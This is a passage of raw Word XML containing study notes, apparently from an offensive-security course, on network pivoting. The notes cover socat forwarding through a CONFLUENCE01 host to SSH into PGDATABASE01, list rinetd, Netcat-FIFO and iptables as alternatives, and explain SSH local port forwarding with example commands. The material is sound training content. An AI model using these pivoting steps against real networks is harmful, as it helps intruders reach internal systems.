      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">for PGDATABASE01</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007F7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007F8">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now we can SSH as if we had a direct connection to port 22 on PGDATABASE01. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">But, we specify the port and IP of CONFLUENCE01.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007F9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007FA">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh database_admin@192.168.50.63 -p2222</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007FB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1485"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.50.63</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is CONFLUENCE01</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007FC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007FD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007FE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Alternatives to socat:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007FF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1483"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rinetd is an option that runs as a daemon. This makes it a better solution for longer-term port forwarding configurations but is slightly unwieldy for temporary port forwarding solutions.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000800">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1483"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can combine Netcat and a FIFO named pipe file to create a port forward.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000801">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1483"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If we have root privileges, we could use iptables to create port forwards. The specific iptables port forwarding setup for a given host will likely depend on the configuration already in place. To be able to forward packets in Linux also requires enabling forwarding on the interface we want to forward on by writing "1" to /proc/sys/net/ipv4/conf/[interface]/forwarding (if it's not already configured to allow it).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000802">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000803">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008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05">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ckod8pboxmqr" w:id="71"/>
      <w:bookmarkEnd w:id="71"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SSH Port Forwarding vs. Socat Port Forwarding</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000806">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000807">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">With</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Socat</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">listening and forwarding</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> were both done from the same host (CONFLUENCE01).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000808">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000809">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SSH local port forwarding </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">adds a small twist to this. With SSH local port forwarding, packets are not forwarded by the same host that listens for packets. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Instead, an SSH connection is made between two hosts (an SSH client and an SSH server),</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> a listening port is opened by the SSH client, and all packets received on this port are tunneled through the SSH connection to the SSH server. The packets are then forwarded by the SSH server to the socket we specify.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000080A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="509"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For example, if we have our </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Kali</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">middleman</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, and a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">target</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we would open SSH on our Kali (SSH client) and connect to the middleman (SSH server). All packets received on the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SSH clien</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">t (via loopback on our Kali) are then forwarded via SSH tunnel to the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SSH server.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> And then the packets are forwarded (from SSH server) to another </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">socket </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(in this case, the IP and port of the</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> target machine</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. This socket can refer to the SSH server itself or a completely different machine, anything that the SSH server can access.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000080B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000080C">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">What is a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">socket</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000080D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">A socket is a combination of:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000080E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1354"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">an</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> IP address</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000080F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1354"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and a</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> port number</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000810">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Together, they form something like: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.1.10:5432</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000811">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008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13">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_9edurrac5chz" w:id="72"/>
      <w:bookmarkEnd w:id="72"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SSH Local Port Forwarding</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000814">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000815">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1892300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="131" name="image141.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image141.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId179"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="189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16">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">XXXXXXXXX</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Module 19</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000817">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000818">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In most official documentation, tunneling data through an SSH connection is referred to as SSH port forwarding. But, a regular SSH connection is not a port forward</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000819">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="311"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">All SSH uses encryption and creates a tunnel.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000081A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="311"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">But </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"SSH port forwarding" refers specifically to using that tunnel to carry arbitrary TCP traffic</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (not just shell or file transfer).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000081B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000081C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the following example from the book, we learn an example where we have 3 subnets instead of 2. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">But, we can also use SSH local port forwarding in the same example as the socat one, where we have two subnets and one middleman.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> We can do something like this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000081D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="457"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh -N -L 4445:TARGET:22 user@MIDDLEMAN</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000081E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="457"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We run this on our OWN kali</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000081F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="457"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Visiting localhost:4445 actually sends packets through the SSH tunnel to Middleman</w:t>
      </w:r>
